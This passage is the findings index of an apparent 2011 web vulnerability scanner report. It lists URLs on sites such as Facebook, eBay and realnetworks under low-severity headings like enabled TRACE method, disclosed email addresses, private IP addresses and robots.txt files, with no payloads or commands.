21.7. http://bing.fansnap.com/checkout/index/418563179

21.8. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

21.9. http://cc.bingj.com/cache.aspx

21.10. http://developers.facebook.com/

21.11. http://digg.com/submit

21.12. http://feeds.feedburner.com/netsparker

21.13. http://googleads.g.doubleclick.net/pagead/ads

21.14. http://investor.realnetworks.com/stockquote.cfm

21.15. http://js.myspacecdn.com/modules/common/static/js/jquery/msglobal_yu2qtsmq.js

21.16. http://majornelson.com/

21.17. http://mobile.ebay.com/

21.18. http://mobile.ebay.com/mobileweb/ebay

21.19. http://mobileweb.ebay.com/

21.20. http://r1-ads.ace.advertising.com/site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue

21.21. http://realnetworks.com/

21.22. http://realnetworks.com/about-us/affiliate.aspx

21.23. http://realnetworks.com/contact-us.aspx

21.24. http://realnetworks.com/contact-us/realnetworks-united-states-offices.aspx

21.25. http://realnetworks.com/pressroom/index.aspx

21.26. http://rmedia.boston.com/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5

21.27. http://sharethis.com/account/signin-widget

21.28. https://signin.ebay.com/ws/eBayISAPI.dll

21.29. http://support.gamehouse.com/

21.30. http://support.gamehouse.com/app/answers/detail/a_id/861/

21.31. http://support.gamehouse.com/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D

21.32. http://support.gamehouse.com/app/contact

21.33. http://support.microsoft.com/contactus/

21.34. http://umfcluj.ro/

21.35. http://umfcluj.ro/Detaliu.aspx

21.36. http://umfcluj.ro/contact.aspx

21.37. http://umfcluj.ro/en

21.38. http://umfcluj.ro/fr

21.39. http://umfcluj.ro/lista.aspx

21.40. http://umfcluj.ro/search.aspx

21.41. http://umfcluj.ro/sitemap.aspx

21.42. http://www.adminitrack.com/

21.43. http://www.atlassian.com/en/resources/wac/js/globalNav.js

21.44. http://www.atlassian.com/software/jira/pricing.jsp

21.45. http://www.axosoft.com/

21.46. http://www.axosoft.com/lp/ga/bug-tracking-software/

21.47. http://www.axosoft.com/ontime

21.48. http://www.axosoft.com/ontime/bug_tracking

21.49. http://www.bnymellonam.com/core/hub/am_site_selector.html

21.50. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

21.51. http://www.discoverbing.com/

21.52. http://www.facebook.com/advertising/

21.53. http://www.facebook.com/ajax/intl/language_dialog.php

21.54. http://www.facebook.com/badges/

21.55. http://www.facebook.com/careers/

21.56. http://www.facebook.com/directory/pages/

21.57. http://www.facebook.com/directory/people/

21.58. http://www.facebook.com/facebook

21.59. http://www.facebook.com/find-friends

21.60. http://www.facebook.com/help/

21.61. http://www.facebook.com/mobile/

21.62. http://www.facebook.com/pages/create.php

21.63. http://www.facebook.com/plugins/activity.php

21.64. http://www.facebook.com/plugins/likebox.php

21.65. http://www.facebook.com/privacy/explanation.php

21.66. http://www.facebook.com/r.php

21.67. http://www.facebook.com/terms.php

21.68. http://www.factset.com/

21.69. http://www.factset.com/events

21.70. http://www.factset.com/images/searchInputBg.gif

21.71. http://www.factset.com/products/im

21.72. http://www.factset.com/products/im/img/im/title_1_2.png

21.73. http://www.factset.com/products/privateequity

21.74. http://www.fansnap.com/

21.75. http://www.fansnap.com/developers

21.76. http://www.fastteks.com/TechSolutions/News.aspx

21.77. http://www.gamestop.com/

21.78. http://www.googlelabs.com/

21.79. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

21.80. http://www.intelex.com/landing/~/script/highslide/highslide.css

21.81. http://www.livedrive.com/

21.82. http://www.livedrive.com/ForHome/ProSuite

21.83. http://www.livedrive.com/SignupToLivedrive

21.84. http://www.mavitunasecurity.com/

21.85. http://www.mavitunasecurity.com/blog/

21.86. http://www.myspace.com/auth/loginform

21.87. http://www.nne.aaa.com/en-nne/Pages/Home.aspx

21.88. http://www.numarasoftware.com/welcome/service_desk.aspx

21.89. http://www.seapine.com/ttpro.html

21.90. http://www.stubhub.com/

21.91. http://www.stumbleupon.com/submit

21.92. http://www.techexcel.com/products/devsuite/devteststudio.html

21.93. http://www.versionone.com/Product/

22. TRACE method is enabled

22.1. http://ads.as4x.tmcs.ticketmaster.com/

22.2. http://bh.contextweb.com/

22.3. http://bing.fansnap.com/

22.4. http://blog.linode.com/

22.5. http://cache.specificmedia.com/

22.6. http://cdn1.diggstatic.com/

22.7. http://cheetah.vizu.com/

22.8. http://clk.specificclick.net/

22.9. http://digg.com/

22.10. http://matcher-apx.bidder7.mookie1.com/

22.11. http://matcher-cwb.bidder7.mookie1.com/

22.12. http://matcher.bidder7.mookie1.com/

22.13. http://matcher.bidder8.mookie1.com/

22.14. http://puma.vizu.com/

22.15. http://rmedia.boston.com/

22.16. http://rt.legolas-media.com/

22.17. http://sharethis.com/

22.18. http://t.mookie1.com/

22.19. http://widgets.outbrain.com/

22.20. http://www.seapine.com/

22.21. http://www.stumbleupon.com/

23. Email addresses disclosed

23.1. http://ads.msn.com/library/dapmsn.js

23.2. http://az10143.vo.msecnd.net/sitecore/dbing/media/Images/homepage/rr-partypeople.jpg

23.3. http://b3.mookie1.com/RealMedia/ads/Creatives/USNetwork/TRACK_MIG/mig_analytics.js

23.4. http://cache.boston.com/universal/js/bcom_hp_scripts.js

23.5. http://cache.boston.com/universal/js/twitterwidget.js

23.6. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

23.7. http://cdn-0.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

23.8. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

23.9. http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

23.10. http://feedburner.google.com/fb/feed-styles/bf30.js

23.11. http://i2.onlinehelp.microsoft.com/Areas/Global/Content/Omniture/resources/OnlineHelp/omni_rsid_OnlineHelp.js

23.12. https://login.live.com/login.srf

23.13. http://majornelson.com/wp-content/themes/roundhouse/style.css

23.14. http://media.gamehouse.com/4/js/s_code_test.js

23.15. http://media.ticketmaster.com/en-us/js/1cf39641cc0465a6e003b267636b5ebb/prototype/controls.js

23.16. http://realnetworks.com/WorkArea/java/ektron.js

23.17. http://realnetworks.com/pressroom/index.aspx

23.18. http://service.real.com/international/br/

23.19. http://sharethis.com/account/signin-widget

23.20. http://sharethis.com/ext/adapter/ext/ext-base.js

23.21. http://sharethis.com/ext/ext-all.js

23.22. http://sharethis.com/ext/resources/css/ext-all.css

23.23. http://sharethis.com/privacy

23.24. http://sharethis.com/register

23.25. http://umfcluj.ro/js/jquery.emptyOnFocus.js

23.26. http://umfcluj.ro/js/jquery.hoverIntent.js

23.27. http://umfcluj.ro/lista.aspx

23.28. http://umfcluj.ro/lista.aspx

23.29. http://umfcluj.ro/lista.aspx

23.30. http://umfcluj.ro/lista.aspx

23.31. http://umfcluj.ro/lista.aspx

23.32. http://umfcluj.ro/lista.aspx

23.33. http://umfcluj.ro/lista.aspx

23.34. http://umfcluj.ro/lista.aspx

23.35. http://w.sharethis.com/button/buttons.js

23.36. http://widgets.outbrain.com/outbrainWidget.js

23.37. http://widgets.twimg.com/j/2/widget-2.2.css

23.38. http://www.bnymellon.com/foresight/index.html

23.39. http://www.bnymellon.com/foresight/richardhoey.html

23.40. http://www.bnymellon.com/wealthmanagement/index.html

23.41. http://www.factset.com/

23.42. http://www.factset.com/events

23.43. http://www.factset.com/files/jquery/nifty/niftycube.js

23.44. http://www.factset.com/images/searchInputBg.gif

23.45. http://www.factset.com/products/im

23.46. http://www.factset.com/products/im/img/im/title_1_2.png

23.47. http://www.factset.com/products/privateequity

23.48. http://www.fansnap.com/

23.49. http://www.fansnap.com/developers

23.50. http://www.fastteks.com/TechSolutions/About-Us.aspx

23.51. http://www.fastteks.com/TechSolutions/Contact-Us.aspx

23.52. http://www.fastteks.com/TechSolutions/Default.aspx

23.53. http://www.fastteks.com/TechSolutions/News.aspx

23.54. http://www.fastteks.com/TechSolutions/Services.aspx

23.55. http://www.fastteks.com/techsolutions/

23.56. http://www.gamestop.com/

23.57. http://www.googlelabs.com/

23.58. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

23.59. http://www.intelex.com/landing/~/script/highslide/highslide.css

23.60. http://www.linode.com/faq.cfm

23.61. http://www.livedrive.com/Scripts/PreloadImages.js

23.62. http://www.livedrive.com/Scripts/typeface.js

23.63. http://www.mavitunasecurity.com/

23.64. http://www.mookie1.com/contact.php

23.65. http://www.netlogiq.ro/js/jquery.emptyOnFocus.js

23.66. http://www.netlogiq.ro/js/jquery.hoverIntent.js

23.67. http://www.nne.aaa.com/_Layouts/ACSC.MasterMenu.jQuery/jquery.bgiframe.js

23.68. http://www.nne.aaa.com/style%20library/js/tracking/sitecatalyst_scode.js

23.69. http://www.rallydev.com/js/jquery.colorbox-min.js

23.70. http://www.stubhub.com/

23.71. http://www.stubhub.com/content/getPromoContent

23.72. http://www.ticketmaster.com/event/000043582C516D43

23.73. http://www.versionone.com/LandingPgTemp/js/global.js

23.74. http://www.versionone.com/js/global.js

23.75. http://www.versionone.com/js/s_code.js

24. Private IP addresses disclosed

24.1. http://cdn2.diggstatic.com/js/two_column/lib.61fe8366.js

24.2. http://developers.facebook.com/

24.3. http://developers.facebook.com/favicon.ico

24.4. http://developers.facebook.com/images/connect_showcase/platform_showcase_gallery_b.png

24.5. http://developers.facebook.com/images/devsite/icn_facebook_apps.png

24.6. http://developers.facebook.com/images/devsite/icn_mobile.png

24.7. http://developers.facebook.com/images/devsite/icn_open_source.png

24.8. http://digg.com/ajax/tooltip/submit

24.9. http://digg.com/submit

24.10. http://external.ak.fbcdn.net/safe_image.php

24.11. http://external.ak.fbcdn.net/safe_image.php

24.12. http://external.ak.fbcdn.net/safe_image.php

24.13. http://external.ak.fbcdn.net/safe_image.php

24.14. http://platform.ak.fbcdn.net/www/app_full_proxy.php

24.15. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

24.16. http://static.ak.fbcdn.net/connect/xd_proxy.php

24.17. http://static.ak.fbcdn.net/connect/xd_proxy.php

24.18. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/-hUG5Dc8o3Z.css

24.19. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/H9wnMF3Lri6.css

24.20. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/HHkUms5lcpx.css

24.21. http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/vTlzK_6DGwe.css

24.22. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/Mb-ySEi3O0b.css

24.23. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/r0jm6f8JtY2.css

24.24. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/rrdmptIcoxd.css

24.25. http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/PSpx_i42gvE.css

24.26. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4M_1PP4LZN8.js

24.27. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/Q3Oe8zcURw5.css

24.28. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/ts_55XkdiUP.js

24.29. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/v3Y9Tu0WZkw.js

24.30. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/SK9j5prLTwj.css

24.31. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/wRBjYtc4wBS.js

24.32. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/-r69fEK9JXo.js

24.33. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/D-4QGnNagV6.css

24.34. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/q30FbKmaBid.css

24.35. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css

24.36. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/zOMloODzDF_.css

24.37. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/BDfYGSOIQq_.css

24.38. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/KZtmMbNS3_L.css

24.39. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/VXhD5_PgFOo.css

24.40. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/ubbnH6M9ljE.css

24.41. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/-Ho_EIT75He.css

24.42. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/2oQd79CdXv7.css

24.43. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Dg8YLPWKyk7.css

24.44. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/SNrGdWeoQHs.css

24.45. http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/PVBa_VtP99O.css

24.46. http://static.ak.fbcdn.net/rsrc.php/v1/yA/r/C9intiNq_3N.css

24.47. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/PTQolaY4o54.css

24.48. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/PzNsk8U51ji.css

24.49. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/y_PXXLWHa9g.js

24.50. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/08tONxelrvf.css

24.51. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/V-zkfHT8CXb.css

24.52. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/XByeV_qA1Uh.css

24.53. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/4F3Iv5NBJOL.css

24.54. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/lwKG0ViYlaK.css

24.55. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/rwkuDRWV9jd.css

24.56. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/2zvsC0zVzMB.css

24.57. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/FUYS70vIS4_.css

24.58. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/gQh69rr8JBH.css

24.59. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/sobEsVhahXR.css

24.60. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/Bqaiy6eGUJa.css

24.61. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/gh8wxcAgNvK.css

24.62. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/87W0ancRJRW.css

24.63. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/sHCa4y3LzLj.css

24.64. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/_J12hr-nH-4.css

24.65. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/d3jsdgznlXU.css

24.66. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/x_JdY7BNW9-.css

24.67. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/z_rHQCDmDDh.css

24.68. http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/rSJeTgoHNUS.css

24.69. http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/2oTj9mwQeS-.css

24.70. http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/xrEeXUiCo9E.js

24.71. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/Kc1c3lfdICw.css

24.72. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/a1RB0wRyoBD.css

24.73. http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/HTDWQBuWGI8.css

24.74. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/ur_c5XpT6zc.css

24.75. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/O4MC2pFJMzJ.css

24.76. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/j6Y0USeru-T.css

24.77. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/FnGB7tUxwE3.css

24.78. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/aBJXPgldonq.css

24.79. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/c6emPCFfPcn.css

24.80. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/hkM0mPGHIE1.css

24.81. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9d2D5n1k9ZB.css

24.82. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/KdKjGooM6-s.css

24.83. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/7mqITnKP1S_.css

24.84. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/Sg28aMjfbGK.css

24.85. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css

24.86. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/cwpj7clVond.css

24.87. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/fM3yrUPcjJi.js

24.88. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/JtYPs2Da_dw.css

24.89. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/NE1qNsIIHmi.css

24.90. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/PPCATkRjgbb.css

24.91. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/sz5xc1yg7bR.js

24.92. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/7lH5BC-8hlS.css

24.93. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/FmBZt5UgnLN.js

24.94. http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/zpzCcjhbyCZ.css

24.95. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/DZLa1PZIieN.css

24.96. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/NGblq-c7mGZ.css

24.97. http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/K_RxgTvVokq.css

24.98. http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/edfMk-9nmKj.css

24.99. http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/uYvCnbsceoH.css

24.100. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/4Ese_3T2rw0.js

24.101. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/erCj3jAAsca.css

24.102. http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/6gpjXzvXDSF.css

24.103. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/DiI7ZwzsMWE.css

24.104. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/IOfrcReUvwR.js

24.105. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/OFPuB9qmfib.css

24.106. http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/nfbcyOQNzob.js

24.107. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/Rgx_Vz7nSNo.css

24.108. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/heGhkAidtX0.css

24.109. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/msTi-EL7vCK.css

24.110. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/otNsMnT3Ccb.css

24.111. http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/aZS2cs-mE5h.css

24.112. http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/kYoCeJwtttA.js

24.113. http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/Ci-JcEcsrg9.css

24.114. http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/LYx7X5wadgo.js

24.115. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css

24.116. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/PCqjbIZdno-.css

24.117. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/qirUjHNG9oJ.css

24.118. http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/0xUg4sx8bB2.js

24.119. http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/OVLmRskybHj.css

24.120. http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/gdzYpes5-k7.js

24.121. http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/7f4SE3bv4B2.css

24.122. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/SYIMzW6wi61.css

24.123. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/bDUZuV99E60.css

24.124. http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/KL99XeYC7AS.css

24.125. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/clJdoaAA7xi.js

24.126. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/POIirpFgl5q.css

24.127. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/Trz9qEKGISz.css

24.128. http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/5fFMnagjg2S.css

24.129. http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/AKFdbdR6W5B.css

24.130. http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/deIrY85PE2v.png

24.131. http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/ukvLMiNkr_t.png

24.132. http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/v3dJrMQoPk1.png

24.133. http://static.ak.fbcdn.net/rsrc.php/v1/z1/r/qcTMR8qeslF.png

24.134. http://static.ak.fbcdn.net/rsrc.php/v1/z4/r/EAbydW1M_XR.png

24.135. http://static.ak.fbcdn.net/rsrc.php/v1/z6/r/l9Fe9Ugss0S.gif

24.136. http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/UvyvLtJTQzO.png

24.137. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/Z6rULnd-GE-.png

24.138. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/e4jQ5MXLYQ8.png

24.139. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif

24.140. http://static.ak.fbcdn.net/rsrc.php/v1/zB/r/TwAHgQi2ZPB.png

24.141. http://static.ak.fbcdn.net/rsrc.php/v1/zB/r/Unmn04Ngmxd.gif

24.142. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/hIGTc2UFq5P.png

24.143. http://static.ak.fbcdn.net/rsrc.php/v1/zE/r/eh0bmn9m_mm.png

24.144. http://static.ak.fbcdn.net/rsrc.php/v1/zF/r/p13yZ069LVL.png

24.145. http://static.ak.fbcdn.net/rsrc.php/v1/zI/r/llncLdVc0JC.gif

24.146. http://static.ak.fbcdn.net/rsrc.php/v1/zJ/r/RVElCNYrs5z.gif

24.147. http://static.ak.fbcdn.net/rsrc.php/v1/zM/r/7ngmhwdsni2.png

24.148. http://static.ak.fbcdn.net/rsrc.php/v1/zP/r/FzmFaNDPhjU.png

24.149. http://static.ak.fbcdn.net/rsrc.php/v1/zQ/r/WBWgBVeCy7Y.gif

24.150. http://static.ak.fbcdn.net/rsrc.php/v1/zS/r/6DyuwYMrMc0.png

24.151. http://static.ak.fbcdn.net/rsrc.php/v1/zS/r/ccgKJX0yQZC.png

24.152. http://static.ak.fbcdn.net/rsrc.php/v1/zT/r/dDagbUnwf34.png

24.153. http://static.ak.fbcdn.net/rsrc.php/v1/zU/r/gLuMARNlxxj.png

24.154. http://static.ak.fbcdn.net/rsrc.php/v1/zV/r/-pf2bdz3vEg.gif

24.155. http://static.ak.fbcdn.net/rsrc.php/v1/zY/r/1gBp2bDGEuh.gif

24.156. http://static.ak.fbcdn.net/rsrc.php/v1/zY/r/6HL8HSM452G.png

24.157. http://static.ak.fbcdn.net/rsrc.php/v1/z_/r/2Oin6nHA4Mx.png

24.158. http://static.ak.fbcdn.net/rsrc.php/v1/zb/r/3LyZkLVshsc.gif

24.159. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/1x0T5GU6FqP.gif

24.160. http://static.ak.fbcdn.net/rsrc.php/v1/zh/r/HNHvoJkgN6x.png

24.161. http://static.ak.fbcdn.net/rsrc.php/v1/zi/r/PbmUudSYZ0z.png

24.162. http://static.ak.fbcdn.net/rsrc.php/v1/zl/r/6N9FQPpTHCy.png

24.163. http://static.ak.fbcdn.net/rsrc.php/v1/zp/r/-dio0u9UIlC.png

24.164. http://static.ak.fbcdn.net/rsrc.php/v1/zr/r/XXVvDYAks_i.png

24.165. http://static.ak.fbcdn.net/rsrc.php/v1/zs/r/YoX0fw76s5z.gif

24.166. http://static.ak.fbcdn.net/rsrc.php/v1/zs/r/fzdZPrLUwxB.png

24.167. http://static.ak.fbcdn.net/rsrc.php/v1/zu/r/Y4_2_kJqyhn.gif

24.168. http://static.ak.fbcdn.net/rsrc.php/v1/zx/r/cDpiVvg8Q0u.png

24.169. http://static.ak.fbcdn.net/rsrc.php/v1/zz/r/z1xzUcShxUD.png

24.170. http://vimeo.com/moogaloop.swf

24.171. http://vimeo.com/moogaloop.swf

24.172. http://vimeo.com/moogaloop.swf

24.173. http://vimeo.com/moogaloop.swf

24.174. http://www.facebook.com/advertising/

24.175. http://www.facebook.com/ajax/connect/connect_widget.php

24.176. http://www.facebook.com/ajax/connect/connect_widget.php

24.177. http://www.facebook.com/ajax/intl/language_dialog.php

24.178. http://www.facebook.com/ajax/prefetch.php

24.179. http://www.facebook.com/ajax/prefetch.php

24.180. http://www.facebook.com/badges

24.181. http://www.facebook.com/badges/

24.182. http://www.facebook.com/campaign/landing.php

24.183. http://www.facebook.com/campaign/landing.php

24.184. http://www.facebook.com/captcha/tfbimage.php

24.185. http://www.facebook.com/careers/

24.186. http://www.facebook.com/directory/pages/

24.187. http://www.facebook.com/directory/people/

24.188. http://www.facebook.com/extern/login_status.php

24.189. http://www.facebook.com/extern/login_status.php

24.190. http://www.facebook.com/extern/login_status.php

24.191. http://www.facebook.com/extern/login_status.php

24.192. http://www.facebook.com/extern/login_status.php

24.193. http://www.facebook.com/extern/login_status.php

24.194. http://www.facebook.com/extern/login_status.php

24.195. http://www.facebook.com/extern/login_status.php

24.196. http://www.facebook.com/extern/login_status.php

24.197. http://www.facebook.com/extern/login_status.php

24.198. http://www.facebook.com/extern/login_status.php

24.199. http://www.facebook.com/extern/login_status.php

24.200. http://www.facebook.com/extern/login_status.php

24.201. http://www.facebook.com/extern/login_status.php

24.202. http://www.facebook.com/extern/login_status.php

24.203. http://www.facebook.com/extern/login_status.php

24.204. http://www.facebook.com/extern/login_status.php

24.205. http://www.facebook.com/extern/login_status.php

24.206. http://www.facebook.com/extern/login_status.php

24.207. http://www.facebook.com/extern/login_status.php

24.208. http://www.facebook.com/extern/login_status.php

24.209. http://www.facebook.com/extern/login_status.php

24.210. http://www.facebook.com/extern/login_status.php

24.211. http://www.facebook.com/extern/login_status.php

24.212. http://www.facebook.com/extern/login_status.php

24.213. http://www.facebook.com/extern/login_status.php

24.214. http://www.facebook.com/facebook

24.215. http://www.facebook.com/favicon.ico

24.216. http://www.facebook.com/find-friends

24.217. http://www.facebook.com/help/

24.218. http://www.facebook.com/images/contact_importer/login_button/yahoo.png

24.219. http://www.facebook.com/images/loaders/indicator_black.gif

24.220. http://www.facebook.com/images/registration_graphic.png

24.221. http://www.facebook.com/mobile

24.222. http://www.facebook.com/mobile/

24.223. http://www.facebook.com/pages/create.php

24.224. http://www.facebook.com/plugins/activity.php

24.225. http://www.facebook.com/plugins/like.php

24.226. http://www.facebook.com/plugins/like.php

24.227. http://www.facebook.com/plugins/like.php

24.228. http://www.facebook.com/plugins/like.php

24.229. http://www.facebook.com/plugins/like.php

24.230. http://www.facebook.com/plugins/like.php

24.231. http://www.facebook.com/plugins/like.php

24.232. http://www.facebook.com/plugins/like.php

24.233. http://www.facebook.com/plugins/like.php

24.234. http://www.facebook.com/plugins/like.php

24.235. http://www.facebook.com/plugins/like.php

24.236. http://www.facebook.com/plugins/like.php

24.237. http://www.facebook.com/plugins/like.php

24.238. http://www.facebook.com/plugins/like.php

24.239. http://www.facebook.com/plugins/like.php

24.240. http://www.facebook.com/plugins/like.php

24.241. http://www.facebook.com/plugins/like.php

24.242. http://www.facebook.com/plugins/like.php

24.243. http://www.facebook.com/plugins/like.php

24.244. http://www.facebook.com/plugins/like.php

24.245. http://www.facebook.com/plugins/likebox.php

24.246. http://www.facebook.com/plugins/likebox.php

24.247. http://www.facebook.com/plugins/likebox.php

24.248. http://www.facebook.com/privacy/explanation.php

24.249. http://www.facebook.com/r.php

24.250. http://www.facebook.com/r.php

24.251. http://www.facebook.com/terms.php

24.252. http://www.gamestop.com/

24.253. http://www.google.com/sdch/StnTz5pY.dct

25. Credit card numbers disclosed

25.1. http://www.facebook.com/directory/pages/

25.2. http://www.facebook.com/directory/people/

25.3. http://www.livedrive.com/Scripts/colaborate-medium_regular.typeface.js

26. Robots.txt file

26.1. http://0.gravatar.com/avatar/a9253565cd7a0a613c1147db0e66e6f0

26.2. http://040-eex-147.mktoresp.com/webevents/visitWebPage

26.3. http://1.gravatar.com/avatar/16984fd773fe4e40c9cb0e60ff81e600

26.4. http://624-vqc-743.mktoresp.com/webevents/visitWebPage

26.5. http://a.netmng.com/hic/

26.6. http://a.ok.facebook.com/cm/bk/9998-58063-3840-0

26.7. http://a.tribalfusion.com/j.ad

26.8. http://a1.bing4.com/imagenewsfetcher.aspx

26.9. http://a2.bing4.com/imagenewsfetcher.aspx

